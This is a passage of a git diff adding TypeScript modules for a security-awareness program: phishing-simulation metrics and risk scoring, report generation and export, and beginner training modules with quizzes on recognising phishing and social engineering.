+ * @module pentest/soceng/awareness/metrics
+ */
+
+import { SocEngTypes } from "../types"
+
+/**
+ * Awareness metrics namespace.
+ */
+export namespace AwarenessMetrics {
+  // ========== Metric Types ==========
+
+  /**
+   * Organization security metrics.
+   */
+  export interface OrganizationMetrics {
+    organizationId: string
+    period: MetricPeriod
+    phishingMetrics: PhishingMetrics
+    trainingMetrics: TrainingMetrics
+    riskScore: number
+    trend: "improving" | "stable" | "declining"
+    recommendations: string[]
+    timestamp: number
+  }
+
+  /**
+   * Metric period.
+   */
+  export interface MetricPeriod {
+    start: number
+    end: number
+    label: string
+  }
+
+  /**
+   * Phishing simulation metrics.
+   */
+  export interface PhishingMetrics {
+    campaignsRun: number
+    totalTargets: number
+    emailsSent: number
+    emailsOpened: number
+    linksClicked: number
+    credentialsSubmitted: number
+    reported: number
+    openRate: number
+    clickRate: number
+    submitRate: number
+    reportRate: number
+    averageTimeToClick: number
+    averageTimeToReport: number
+  }
+
+  /**
+   * Training metrics.
+   */
+  export interface TrainingMetrics {
+    modulesAssigned: number
+    modulesCompleted: number
+    completionRate: number
+    averageScore: number
+    passRate: number
+    totalTrainingTime: number
+    topPerformers: number
+    needsImprovement: number
+  }
+
+  /**
+   * Department metrics.
+   */
+  export interface DepartmentMetrics {
+    department: string
+    employeeCount: number
+    phishing: {
+      clickRate: number
+      submitRate: number
+      reportRate: number
+    }
+    training: {
+      completionRate: number
+      averageScore: number
+    }
+    riskLevel: "low" | "medium" | "high" | "critical"
+  }
+
+  /**
+   * Individual metrics.
+   */
+  export interface IndividualMetrics {
+    userId: string
+    email: string
+    department?: string
+    phishingTests: number
+    clicked: number
+    submitted: number
+    reported: number
+    trainingsCompleted: number
+    averageScore: number
+    riskLevel: "low" | "medium" | "high"
+    lastPhishingTest?: number
+    lastTraining?: number
+  }
+
+  // ========== Metric Calculation ==========
+
+  /**
+   * Calculate phishing metrics from campaign results.
+   */
+  export function calculatePhishingMetrics(
+    campaigns: SocEngTypes.Campaign[]
+  ): PhishingMetrics {
+    let totalTargets = 0
+    let emailsSent = 0
+    let emailsOpened = 0
+    let linksClicked = 0
+    let credentialsSubmitted = 0
+    let reported = 0
+
+    for (const campaign of campaigns) {
+      totalTargets += campaign.targets.length
+      if (campaign.results) {
+        emailsSent += campaign.results.sent
+        emailsOpened += campaign.results.opened
+        linksClicked += campaign.results.clicked
+        credentialsSubmitted += campaign.results.submitted
+        reported += campaign.results.reported
+      }
+    }
+
+    return {
+      campaignsRun: campaigns.length,
+      totalTargets,
+      emailsSent,
+      emailsOpened,
+      linksClicked,
+      credentialsSubmitted,
+      reported,
+      openRate: emailsSent > 0 ? (emailsOpened / emailsSent) * 100 : 0,
+      clickRate: emailsOpened > 0 ? (linksClicked / emailsOpened) * 100 : 0,
+      submitRate: linksClicked > 0 ? (credentialsSubmitted / linksClicked) * 100 : 0,
+      reportRate: emailsSent > 0 ? (reported / emailsSent) * 100 : 0,
+      averageTimeToClick: 0, // Would need timeline data
+      averageTimeToReport: 0, // Would need timeline data
+    }
+  }
+
+  /**
+   * Calculate risk score (0-100).
+   */
+  export function calculateRiskScore(metrics: PhishingMetrics): number {
+    // Higher click/submit rates = higher risk
+    // Higher report rate = lower risk
+
+    let score = 0
+
+    // Click rate contribution (0-40 points)
+    score += Math.min(40, metrics.clickRate * 2)
+
+    // Submit rate contribution (0-40 points)
+    score += Math.min(40, metrics.submitRate * 4)
+
+    // Report rate reduces score (up to -20 points)
+    score -= Math.min(20, metrics.reportRate * 0.4)
+
+    return Math.max(0, Math.min(100, score))
+  }
+
+  /**
+   * Determine trend from historical data.
+   */
+  export function determineTrend(
+    currentScore: number,
+    previousScore: number
+  ): "improving" | "stable" | "declining" {
+    const diff = previousScore - currentScore // Lower score is better
+
+    if (diff > 5) return "improving"
+    if (diff < -5) return "declining"
+    return "stable"
+  }
+
+  /**
+   * Generate recommendations based on metrics.
+   */
+  export function generateRecommendations(metrics: PhishingMetrics): string[] {
+    const recommendations: string[] = []
+
+    if (metrics.clickRate > 20) {
+      recommendations.push(
+        "High click rate detected - increase phishing awareness training frequency"
+      )
+    }
+
+    if (metrics.submitRate > 10) {
+      recommendations.push(
+        "Critical: High credential submission rate - implement mandatory training"
+      )
+    }
+
+    if (metrics.reportRate < 20) {
+      recommendations.push(
+        "Low report rate - educate users on how and why to report suspicious emails"
+      )
+    }
+
+    if (metrics.openRate > 60) {
+      recommendations.push(
+        "Consider training on email preview behaviors and urgency tactics"
+      )
+    }
+
+    if (recommendations.length === 0) {
+      recommendations.push("Security awareness metrics are within acceptable ranges")
+    }
+
+    return recommendations
+  }
+
+  // ========== Benchmarking ==========
+
+  /**
+   * Industry benchmarks.
+   */
+  export const INDUSTRY_BENCHMARKS = {
+    general: {
+      clickRate: 12,
+      submitRate: 4,
+      reportRate: 20,
+    },
+    healthcare: {
+      clickRate: 18,
+      submitRate: 6,
+      reportRate: 15,
+    },
+    finance: {
+      clickRate: 8,
+      submitRate: 3,
+      reportRate: 30,
+    },
+    technology: {
+      clickRate: 10,
+      submitRate: 3,
+      reportRate: 35,
+    },
+    education: {
+      clickRate: 20,
+      submitRate: 8,
+      reportRate: 10,
+    },
+    government: {
+      clickRate: 14,
+      submitRate: 5,
+      reportRate: 22,
+    },
+  }
+
+  /**
+   * Compare metrics against benchmarks.
+   */
+  export function compareToBenchmark(
+    metrics: PhishingMetrics,
+    industry: keyof typeof INDUSTRY_BENCHMARKS = "general"
+  ): BenchmarkComparison {
+    const benchmark = INDUSTRY_BENCHMARKS[industry]
+
+    return {
+      industry,
+      clickRate: {
+        value: metrics.clickRate,
+        benchmark: benchmark.clickRate,
+        status:
+          metrics.clickRate <= benchmark.clickRate ? "at_or_below" : "above",
+      },
+      submitRate: {
+        value: metrics.submitRate,
+        benchmark: benchmark.submitRate,
+        status:
+          metrics.submitRate <= benchmark.submitRate ? "at_or_below" : "above",
+      },
+      reportRate: {
+        value: metrics.reportRate,
+        benchmark: benchmark.reportRate,
+        status:
+          metrics.reportRate >= benchmark.reportRate ? "at_or_above" : "below",
+      },
+    }
+  }
+
+  /**
+   * Benchmark comparison result.
+   */
+  export interface BenchmarkComparison {
+    industry: string
+    clickRate: {
+      value: number
+      benchmark: number
+      status: "at_or_below" | "above"
+    }
+    submitRate: {
+      value: number
+      benchmark: number
+      status: "at_or_below" | "above"
+    }
+    reportRate: {
+      value: number
+      benchmark: number
+      status: "at_or_above" | "below"
+    }
+  }
+
+  // ========== Risk Levels ==========
+
+  /**
+   * Risk level thresholds.
+   */
+  export const RISK_THRESHOLDS = {
+    low: { maxClickRate: 10, maxSubmitRate: 3 },
+    medium: { maxClickRate: 20, maxSubmitRate: 8 },
+    high: { maxClickRate: 35, maxSubmitRate: 15 },
+    critical: { maxClickRate: 100, maxSubmitRate: 100 },
+  }
+
+  /**
+   * Determine risk level.
+   */
+  export function determineRiskLevel(
+    clickRate: number,
+    submitRate: number
+  ): "low" | "medium" | "high" | "critical" {
+    if (
+      clickRate <= RISK_THRESHOLDS.low.maxClickRate &&
+      submitRate <= RISK_THRESHOLDS.low.maxSubmitRate
+    ) {
+      return "low"
+    }
+    if (
+      clickRate <= RISK_THRESHOLDS.medium.maxClickRate &&
+      submitRate <= RISK_THRESHOLDS.medium.maxSubmitRate
+    ) {
+      return "medium"
+    }
+    if (
+      clickRate <= RISK_THRESHOLDS.high.maxClickRate &&
+      submitRate <= RISK_THRESHOLDS.high.maxSubmitRate
+    ) {
+      return "high"
+    }
+    return "critical"
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format phishing metrics.
+   */
+  export function formatPhishingMetrics(metrics: PhishingMetrics): string {
+    const lines: string[] = []
+
+    lines.push("Phishing Simulation Metrics")
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Campaigns Run: ${metrics.campaignsRun}`)
+    lines.push(`Total Targets: ${metrics.totalTargets}`)
+    lines.push("")
+    lines.push("Email Metrics:")
+    lines.push(`  Sent: ${metrics.emailsSent}`)
+    lines.push(`  Opened: ${metrics.emailsOpened} (${metrics.openRate.toFixed(1)}%)`)
+    lines.push(`  Clicked: ${metrics.linksClicked} (${metrics.clickRate.toFixed(1)}%)`)
+    lines.push(
+      `  Submitted: ${metrics.credentialsSubmitted} (${metrics.submitRate.toFixed(1)}%)`
+    )
+    lines.push(`  Reported: ${metrics.reported} (${metrics.reportRate.toFixed(1)}%)`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format risk score.
+   */
+  export function formatRiskScore(score: number): string {
+    const lines: string[] = []
+
+    const level =
+      score <= 25
+        ? "LOW"
+        : score <= 50
+          ? "MEDIUM"
+          : score <= 75
+            ? "HIGH"
+            : "CRITICAL"
+
+    const icon =
+      level === "LOW"
+        ? "🟢"
+        : level === "MEDIUM"
+          ? "🟡"
+          : level === "HIGH"
+            ? "🟠"
+            : "🔴"
+
+    lines.push(`${icon} Risk Score: ${Math.round(score)}/100 (${level})`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format benchmark comparison.
+   */
+  export function formatBenchmark(comparison: BenchmarkComparison): string {
+    const lines: string[] = []
+
+    lines.push(`Industry Benchmark: ${comparison.industry}`)
+    lines.push("=".repeat(40))
+
+    const formatMetric = (
+      name: string,
+      value: number,
+      bench: number,
+      better: "lower" | "higher"
+    ) => {
+      const icon =
+        better === "lower"
+          ? value <= bench
+            ? "✓"
+            : "✗"
+          : value >= bench
+            ? "✓"
+            : "✗"
+
+      return `${icon} ${name}: ${value.toFixed(1)}% (benchmark: ${bench}%)`
+    }
+
+    lines.push(
+      formatMetric(
+        "Click Rate",
+        comparison.clickRate.value,
+        comparison.clickRate.benchmark,
+        "lower"
+      )
+    )
+    lines.push(
+      formatMetric(
+        "Submit Rate",
+        comparison.submitRate.value,
+        comparison.submitRate.benchmark,
+        "lower"
+      )
+    )
+    lines.push(
+      formatMetric(
+        "Report Rate",
+        comparison.reportRate.value,
+        comparison.reportRate.benchmark,
+        "higher"
+      )
+    )
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/awareness/reporting.ts b/packages/opencode/src/pentest/soceng/awareness/reporting.ts
new file mode 100644
index 00000000000..0d18933693a
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/awareness/reporting.ts
@@ -0,0 +1,419 @@
+/**
+ * @fileoverview Security Awareness Reporting
+ *
+ * Report generation for security awareness programs.
+ *
+ * @module pentest/soceng/awareness/reporting
+ */
+
+import { SocEngTypes } from "../types"
+import { AwarenessMetrics } from "./metrics"
+
+/**
+ * Awareness reporting namespace.
+ */
+export namespace AwarenessReporting {
+  // ========== Report Types ==========
+
+  /**
+   * Executive summary report.
+   */
+  export interface ExecutiveSummary {
+    title: string
+    period: string
+    generatedAt: number
+    highlights: string[]
+    riskScore: number
+    riskTrend: string
+    keyMetrics: {
+      name: string
+      value: string
+      change?: string
+    }[]
+    recommendations: string[]
+  }
+
+  /**
+   * Detailed campaign report.
+   */
+  export interface CampaignReport {
+    campaign: {
+      id: string
+      name: string
+      type: string
+      startDate: number
+      endDate?: number
+    }
+    summary: {
+      totalTargets: number
+      emailsSent: number
+      openRate: number
+      clickRate: number
+      submitRate: number
+      reportRate: number
+    }
+    timeline: {
+      timestamp: number
+      event: string
+      count: number
+    }[]
+    departmentBreakdown: {
+      department: string
+      targets: number
+      clicked: number
+      submitted: number
+      reported: number
+    }[]
+    findings: string[]
+    recommendations: string[]
+  }
+
+  /**
+   * Department risk report.
+   */
+  export interface DepartmentReport {
+    department: string
+    period: string
+    employeeCount: number
+    riskLevel: string
+    metrics: {
+      phishingTests: number
+      clickRate: number
+      submitRate: number
+      reportRate: number
+      trainingCompletion: number
+      averageScore: number
+    }
+    comparison: {
+      metric: string
+      department: number
+      organization: number
+      status: string
+    }[]
+    topRisks: string[]
+    recommendations: string[]
+  }
+
+  // ========== Report Generation ==========
+
+  /**
+   * Generate executive summary.
+   */
+  export function generateExecutiveSummary(
+    campaigns: SocEngTypes.Campaign[],
+    previousMetrics?: AwarenessMetrics.PhishingMetrics
+  ): ExecutiveSummary {
+    const metrics = AwarenessMetrics.calculatePhishingMetrics(campaigns)
+    const riskScore = AwarenessMetrics.calculateRiskScore(metrics)
+
+    const trend = previousMetrics
+      ? AwarenessMetrics.determineTrend(
+          riskScore,
+          AwarenessMetrics.calculateRiskScore(previousMetrics)
+        )
+      : "stable"
+
+    const highlights: string[] = []
+
+    if (metrics.submitRate > 10) {
+      highlights.push(
+        `⚠️ Critical: ${metrics.submitRate.toFixed(1)}% credential submission rate`
+      )
+    }
+
+    if (metrics.reportRate > 30) {
+      highlights.push(
+        `✓ Strong: ${metrics.reportRate.toFixed(1)}% phishing report rate`
+      )
+    }
+
+    if (metrics.clickRate < 15) {
+      highlights.push(
+        `✓ Good: Click rate below industry average at ${metrics.clickRate.toFixed(1)}%`
+      )
+    }
+
+    highlights.push(`${campaigns.length} phishing campaigns conducted`)
+    highlights.push(`${metrics.totalTargets} employees tested`)
+
+    return {
+      title: "Security Awareness Executive Summary",
+      period: `${new Date().toLocaleDateString()} Report`,
+      generatedAt: Date.now(),
+      highlights,
+      riskScore,
+      riskTrend: trend,
+      keyMetrics: [
+        { name: "Click Rate", value: `${metrics.clickRate.toFixed(1)}%` },
+        { name: "Submit Rate", value: `${metrics.submitRate.toFixed(1)}%` },
+        { name: "Report Rate", value: `${metrics.reportRate.toFixed(1)}%` },
+        { name: "Risk Score", value: `${Math.round(riskScore)}/100` },
+      ],
+      recommendations: AwarenessMetrics.generateRecommendations(metrics),
+    }
+  }
+
+  /**
+   * Generate campaign report.
+   */
+  export function generateCampaignReport(
+    campaign: SocEngTypes.Campaign
+  ): CampaignReport {
+    const total = campaign.targets.length
+    const results = campaign.results || { sent: 0, opened: 0, clicked: 0, submitted: 0, reported: 0 }
+    const { sent, opened, clicked, submitted, reported } = results
+
+    // Group by department
+    const deptMap: Record<
+      string,
+      { targets: number; clicked: number; submitted: number; reported: number }
+    > = {}
+
+    for (const target of campaign.targets) {
+      const dept = target.department || "Unknown"
+      if (!deptMap[dept]) {
+        deptMap[dept] = { targets: 0, clicked: 0, submitted: 0, reported: 0 }
+      }
+      deptMap[dept].targets++
+
+      if (target.status === "clicked" || target.status === "submitted") {
+        deptMap[dept].clicked++
+      }
+      if (target.status === "submitted") {
+        deptMap[dept].submitted++
+      }
+      if (target.status === "reported") {
+        deptMap[dept].reported++
+      }
+    }
+
+    const departmentBreakdown = Object.entries(deptMap).map(([dept, data]) => ({
+      department: dept,
+      ...data,
+    }))
+
+    // Generate findings
+    const findings: string[] = []
+    const clickRate = opened > 0 ? (clicked / opened) * 100 : 0
+    const submitRate = clicked > 0 ? (submitted / clicked) * 100 : 0
+
+    if (clickRate > 20) {
+      findings.push(`High click rate (${clickRate.toFixed(1)}%) indicates susceptibility`)
+    }
+
+    if (submitRate > 30) {
+      findings.push(
+        `Very high credential submission rate (${submitRate.toFixed(1)}%)`
+      )
+    }
+
+    // Find highest risk department
+    const riskiestDept = departmentBreakdown.sort((a, b) => {
+      const aRate = a.targets > 0 ? a.clicked / a.targets : 0
+      const bRate = b.targets > 0 ? b.clicked / b.targets : 0
+      return bRate - aRate
+    })[0]
+
+    if (riskiestDept && riskiestDept.clicked > 0) {
+      const rate = (riskiestDept.clicked / riskiestDept.targets) * 100
+      findings.push(
+        `${riskiestDept.department} department has highest click rate at ${rate.toFixed(1)}%`
+      )
+    }
+
+    return {
+      campaign: {
+        id: campaign.id,
+        name: campaign.name,
+        type: campaign.type,
+        startDate: campaign.startDate || campaign.startedAt || campaign.createdAt,
+        endDate: campaign.endDate || campaign.completedAt,
+      },
+      summary: {
+        totalTargets: total,
+        emailsSent: sent,
+        openRate: sent > 0 ? (opened / sent) * 100 : 0,
+        clickRate,
+        submitRate,
+        reportRate: sent > 0 ? (reported / sent) * 100 : 0,
+      },
+      timeline: [], // Would be populated from timeline events
+      departmentBreakdown,
+      findings,
+      recommendations: generateCampaignRecommendations(clickRate, submitRate),
+    }
+  }
+
+  /**
+   * Generate campaign-specific recommendations.
+   */
+  function generateCampaignRecommendations(
+    clickRate: number,
+    submitRate: number
+  ): string[] {
+    const recs: string[] = []
+
+    if (clickRate > 30) {
+      recs.push("Immediate: Conduct mandatory phishing awareness training")
+    } else if (clickRate > 15) {
+      recs.push("Schedule refresher training on identifying phishing emails")
+    }
+
+    if (submitRate > 20) {
+      recs.push("Implement additional authentication safeguards")
+      recs.push("Consider password policy review")
+    }
+
+    recs.push("Share anonymized results with management")
+    recs.push("Follow up with targeted training for high-risk groups")
+
+    return recs
+  }
+
+  // ========== Report Formatting ==========
+
+  /**
+   * Format executive summary.
+   */
+  export function formatExecutiveSummary(summary: ExecutiveSummary): string {
+    const lines: string[] = []
+
+    lines.push("═".repeat(60))
+    lines.push(`  ${summary.title}`)
+    lines.push(`  ${summary.period}`)
+    lines.push("═".repeat(60))
+    lines.push("")
+
+    lines.push("HIGHLIGHTS")
+    lines.push("-".repeat(40))
+    for (const highlight of summary.highlights) {
+      lines.push(`  ${highlight}`)
+    }
+    lines.push("")
+
+    const riskIcon =
+      summary.riskScore <= 25
+        ? "🟢"
+        : summary.riskScore <= 50
+          ? "🟡"
+          : summary.riskScore <= 75
+            ? "🟠"
+            : "🔴"
+
+    lines.push("RISK ASSESSMENT")
+    lines.push("-".repeat(40))
+    lines.push(`  ${riskIcon} Overall Risk Score: ${Math.round(summary.riskScore)}/100`)
+    lines.push(`  Trend: ${summary.riskTrend}`)
+    lines.push("")
+
+    lines.push("KEY METRICS")
+    lines.push("-".repeat(40))
+    for (const metric of summary.keyMetrics) {
+      lines.push(`  ${metric.name}: ${metric.value}`)
+    }
+    lines.push("")
+
+    lines.push("RECOMMENDATIONS")
+    lines.push("-".repeat(40))
+    for (let i = 0; i < summary.recommendations.length; i++) {
+      lines.push(`  ${i + 1}. ${summary.recommendations[i]}`)
+    }
+
+    lines.push("")
+    lines.push("═".repeat(60))
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format campaign report.
+   */
+  export function formatCampaignReport(report: CampaignReport): string {
+    const lines: string[] = []
+
+    lines.push(`Campaign Report: ${report.campaign.name}`)
+    lines.push("=".repeat(60))
+    lines.push(`Campaign ID: ${report.campaign.id}`)
+    lines.push(`Type: ${report.campaign.type}`)
+    lines.push(
+      `Period: ${new Date(report.campaign.startDate).toLocaleDateString()}${
+        report.campaign.endDate
+          ? ` - ${new Date(report.campaign.endDate).toLocaleDateString()}`
+          : " (ongoing)"
+      }`
+    )
+    lines.push("")
+
+    lines.push("SUMMARY")
+    lines.push("-".repeat(40))
+    lines.push(`  Total Targets: ${report.summary.totalTargets}`)
+    lines.push(`  Emails Sent: ${report.summary.emailsSent}`)
+    lines.push(`  Open Rate: ${report.summary.openRate.toFixed(1)}%`)
+    lines.push(`  Click Rate: ${report.summary.clickRate.toFixed(1)}%`)
+    lines.push(`  Submit Rate: ${report.summary.submitRate.toFixed(1)}%`)
+    lines.push(`  Report Rate: ${report.summary.reportRate.toFixed(1)}%`)
+    lines.push("")
+
+    lines.push("DEPARTMENT BREAKDOWN")
+    lines.push("-".repeat(40))
+    lines.push("  Department         | Targets | Clicked | Submitted | Reported")
+    lines.push("  " + "-".repeat(55))
+    for (const dept of report.departmentBreakdown) {
+      const deptName = dept.department.padEnd(18)
+      lines.push(
+        `  ${deptName} | ${dept.targets.toString().padStart(7)} | ${dept.clicked.toString().padStart(7)} | ${dept.submitted.toString().padStart(9)} | ${dept.reported.toString().padStart(8)}`
+      )
+    }
+    lines.push("")
+
+    if (report.findings.length > 0) {
+      lines.push("KEY FINDINGS")
+      lines.push("-".repeat(40))
+      for (const finding of report.findings) {
+        lines.push(`  ⚠ ${finding}`)
+      }
+      lines.push("")
+    }
+
+    lines.push("RECOMMENDATIONS")
+    lines.push("-".repeat(40))
+    for (const rec of report.recommendations) {
+      lines.push(`  • ${rec}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  // ========== Export Formats ==========
+
+  /**
+   * Export to CSV format.
+   */
+  export function exportToCSV(report: CampaignReport): string {
+    const lines: string[] = []
+
+    // Header
+    lines.push("Department,Targets,Clicked,Submitted,Reported,Click Rate")
+
+    // Data
+    for (const dept of report.departmentBreakdown) {
+      const clickRate =
+        dept.targets > 0
+          ? ((dept.clicked / dept.targets) * 100).toFixed(1)
+          : "0.0"
+
+      lines.push(
+        `"${dept.department}",${dept.targets},${dept.clicked},${dept.submitted},${dept.reported},${clickRate}%`
+      )
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Export to JSON format.
+   */
+  export function exportToJSON(report: CampaignReport): string {
+    return JSON.stringify(report, null, 2)
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/awareness/training.ts b/packages/opencode/src/pentest/soceng/awareness/training.ts
new file mode 100644
index 00000000000..06ac97e4863
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/awareness/training.ts
@@ -0,0 +1,431 @@
+/**
+ * @fileoverview Security Awareness Training
+ *
+ * Training content and course management for security awareness.
+ *
+ * @module pentest/soceng/awareness/training
+ */
+
+import { SocEngStorage } from "../storage"
+
+/**
+ * Security awareness training namespace.
+ */
+export namespace AwarenessTraining {
+  // ========== Training Types ==========
+
+  /**
+   * Training module.
+   */
+  export interface TrainingModule {
+    id: string
+    name: string
+    description: string
+    category: TrainingCategory
+    duration: number // minutes
+    difficulty: "beginner" | "intermediate" | "advanced"
+    content: TrainingContent
+    quiz: QuizQuestion[]
+    passingScore: number
+    createdAt: number
+  }
+
+  /**
+   * Training category.
+   */
+  export type TrainingCategory =
+    | "phishing"
+    | "social-engineering"
+    | "password-security"
+    | "physical-security"
+    | "data-protection"
+    | "incident-reporting"
+
+  /**
+   * Training content.
+   */
+  export interface TrainingContent {
+    overview: string
+    sections: ContentSection[]
+    keyTakeaways: string[]
+    resources?: string[]
+  }
+
+  /**
+   * Content section.
+   */
+  export interface ContentSection {
+    title: string
+    content: string
+    examples?: string[]
+    tips?: string[]
+  }
+
+  /**
+   * Quiz question.
+   */
+  export interface QuizQuestion {
+    id: string
+    question: string
+    options: string[]
+    correctIndex: number
+    explanation: string
+  }
+
+  /**
+   * Training completion record.
+   */
+  export interface TrainingCompletion {
+    id: string
+    moduleId: string
+    userId: string
+    startedAt: number
+    completedAt?: number
+    quizScore?: number
+    passed: boolean
+    attempts: number
+  }
+
+  // ========== Built-in Training Modules ==========
+
+  /**
+   * Phishing awareness module.
+   */
+  export const PHISHING_BASICS: TrainingModule = {
+    id: "phishing-basics",
+    name: "Phishing Awareness Basics",
+    description: "Learn to identify and avoid phishing attacks",
+    category: "phishing",
+    duration: 15,
+    difficulty: "beginner",
+    content: {
+      overview:
+        "Phishing is one of the most common cyber attacks. This module teaches you how to identify phishing attempts and protect yourself.",
+      sections: [
+        {
+          title: "What is Phishing?",
+          content:
+            "Phishing is a type of social engineering attack where attackers impersonate trusted entities to trick you into revealing sensitive information or taking harmful actions.",
+          examples: [
+            "Fake emails pretending to be from your bank",
+            "Messages claiming you won a prize",
+            "Requests to verify your account information",
+          ],
+        },
+        {
+          title: "Common Phishing Signs",
+          content:
+            "Learn to recognize the red flags that indicate a phishing attempt.",
+          tips: [
+            "Check the sender's actual email address, not just the display name",
+            "Look for spelling and grammar errors",
+            "Be suspicious of urgent requests or threats",
+            "Hover over links before clicking to see the real destination",
+            "Unexpected attachments are suspicious",
+          ],
+        },
+        {
+          title: "What To Do",
+          content:
+            "If you suspect a phishing attempt, take these steps to protect yourself and the organization.",
+          tips: [
+            "Do not click any links or download attachments",
+            "Do not reply to the message",
+            "Report the email using the phishing report button or to IT",
+            "If you clicked a link, report it immediately",
+            "If you entered credentials, change your password immediately",
+          ],
+        },
+      ],
+      keyTakeaways: [
+        "Always verify the sender before taking action",
+        "When in doubt, verify through a separate channel",
+        "Report suspicious messages immediately",
+        "It's better to ask than to click",
+      ],
+    },
+    quiz: [
+      {
+        id: "q1",
+        question:
+          "You receive an email from 'IT Support' asking you to click a link to update your password. What should you do first?",
+        options: [
+          "Click the link and update your password",
+          "Check the sender's actual email address",
+          "Forward it to your colleagues",
+          "Delete it immediately",
+        ],
+        correctIndex: 1,
+        explanation:
+          "Always check the sender's actual email address. Phishing emails often use display names that look legitimate but have different email addresses.",
+      },
+      {
+        id: "q2",
+        question: "Which of the following is a red flag for a phishing email?",
+        options: [
+          "The email comes from a known colleague",
+          "The email has the company logo",
+          "The email creates urgency and threatens account suspension",
+          "The email is sent during business hours",
+        ],
+        correctIndex: 2,
+        explanation:
+          "Urgency and threats are common phishing tactics used to pressure victims into acting quickly without thinking.",
+      },
+      {
+        id: "q3",
+        question:
+          "You accidentally clicked a suspicious link. What should you do?",
+        options: [
+          "Nothing, it's probably fine",
+          "Report it to IT/Security immediately",
+          "Wait and see if anything happens",
+          "Tell no one to avoid embarrassment",
+        ],
+        correctIndex: 1,
+        explanation:
+          "Immediate reporting allows IT to take protective measures. There's no shame in reporting - it helps protect everyone.",
+      },
+    ],
+    passingScore: 70,
+    createdAt: Date.now(),
+  }
+
+  /**
+   * Social engineering awareness module.
+   */
+  export const SOCIAL_ENGINEERING: TrainingModule = {
+    id: "social-engineering",
+    name: "Social Engineering Awareness",
+    description: "Understand and defend against social engineering attacks",
+    category: "social-engineering",
+    duration: 20,
+    difficulty: "intermediate",
+    content: {
+      overview:
+        "Social engineering exploits human psychology rather than technical vulnerabilities. Learn to recognize manipulation tactics.",
+      sections: [
+        {
+          title: "What is Social Engineering?",
+          content:
+            "Social engineering is the art of manipulating people into performing actions or divulging confidential information.",
+          examples: [
+            "Pretexting: Creating a fake scenario to extract information",
+            "Baiting: Offering something enticing to deliver malware",
+            "Tailgating: Following someone into a secure area",
+            "Quid pro quo: Offering a service in exchange for information",
+          ],
+        },
+        {
+          title: "Psychological Tactics",
+          content: "Attackers exploit common psychological triggers.",
+          tips: [
+            "Authority: Impersonating someone in power",
+            "Urgency: Creating time pressure",
+            "Fear: Threatening consequences",
+            "Trust: Building rapport before attacking",
+            "Reciprocity: Doing a favor to get something back",
+          ],
+        },
+        {
+          title: "Defense Strategies",
+          content: "Protect yourself from social engineering attacks.",
+          tips: [
+            "Verify identity through independent means",
+            "Never bypass security procedures, even for executives",
+            "Be cautious of unsolicited help or requests",
+            "Trust your instincts - if something feels wrong, verify",
+            "Report suspicious interactions immediately",
+          ],
+        },
+      ],
+      keyTakeaways: [
+        "Anyone can be a target of social engineering",
+        "Verify requests through established channels",
+        "Slow down when you feel pressured",
+        "There's no shame in saying 'let me verify that'",
+      ],
+    },
+    quiz: [
+      {
+        id: "q1",
+        question:
+          "Someone calls claiming to be from IT and asks for your password to fix an urgent issue. What should you do?",
+        options: [
+          "Give them the password to fix the issue quickly",
+          "Ask for their name and call IT directly to verify",
+          "Give a fake password",
+          "Hang up immediately",
+        ],
+        correctIndex: 1,
+        explanation:
+          "IT will never ask for your password. Call IT directly using a known number to verify any requests.",
+      },
+      {
+        id: "q2",
+        question: "Which psychological trigger do attackers use when they create time pressure?",
+        options: ["Authority", "Trust", "Urgency", "Reciprocity"],
+        correctIndex: 2,
+        explanation:
+          "Urgency is used to prevent you from thinking critically and verifying requests.",
+      },
+    ],
+    passingScore: 70,
+    createdAt: Date.now(),
+  }
+
+  /**
+   * All built-in modules.
+   */
+  export const ALL_MODULES: TrainingModule[] = [
+    PHISHING_BASICS,
+    SOCIAL_ENGINEERING,
+  ]
+
+  // ========== Training Operations ==========
+
+  /**
+   * Get all training modules.
+   */
+  export function getModules(): TrainingModule[] {
+    return ALL_MODULES
+  }
+
+  /**
+   * Get module by ID.
+   */
+  export function getModule(moduleId: string): TrainingModule | undefined {
+    return ALL_MODULES.find((m) => m.id === moduleId)
+  }
+
+  /**
+   * Get modules by category.
+   */
+  export function getByCategory(category: TrainingCategory): TrainingModule[] {
+    return ALL_MODULES.filter((m) => m.category === category)
+  }
+
+  /**
+   * Calculate quiz score.
+   */
+  export function calculateQuizScore(
+    module: TrainingModule,
+    answers: number[]
+  ): { score: number; passed: boolean; results: QuizResult[] } {
+    const results: QuizResult[] = []
+    let correct = 0
+
+    for (let i = 0; i < module.quiz.length; i++) {
+      const question = module.quiz[i]
+      const userAnswer = answers[i]
+      const isCorrect = userAnswer === question.correctIndex
+
+      if (isCorrect) correct++
+
+      results.push({
+        questionId: question.id,
+        correct: isCorrect,
+        userAnswer,
+        correctAnswer: question.correctIndex,
+        explanation: question.explanation,
+      })
+    }
+
+    const score = (correct / module.quiz.length) * 100
+
+    return {
+      score,
+      passed: score >= module.passingScore,
+      results,
+    }
+  }
+
+  /**
+   * Quiz result.
+   */
+  export interface QuizResult {
+    questionId: string
+    correct: boolean
+    userAnswer: number
+    correctAnswer: number
+    explanation: string
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format module list.
+   */
+  export function formatModuleList(): string {
+    const lines: string[] = []
+
+    lines.push("Training Modules")
+    lines.push("=".repeat(50))
+
+    const byCategory: Record<string, TrainingModule[]> = {}
+    for (const module of ALL_MODULES) {
+      if (!byCategory[module.category]) {
+        byCategory[module.category] = []
+      }
+      byCategory[module.category].push(module)
+    }
+
+    for (const [category, modules] of Object.entries(byCategory)) {
+      lines.push("")
+      lines.push(`📚 ${category.toUpperCase()}`)
+
+      for (const module of modules) {
+        lines.push(`   • ${module.name} (${module.duration} min)`)
+        lines.push(`     ${module.description}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format module content for display.
+   */
+  export function formatModuleContent(module: TrainingModule): string {
+    const lines: string[] = []
+
+    lines.push(`📖 ${module.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`Duration: ${module.duration} minutes`)
+    lines.push(`Difficulty: ${module.difficulty}`)
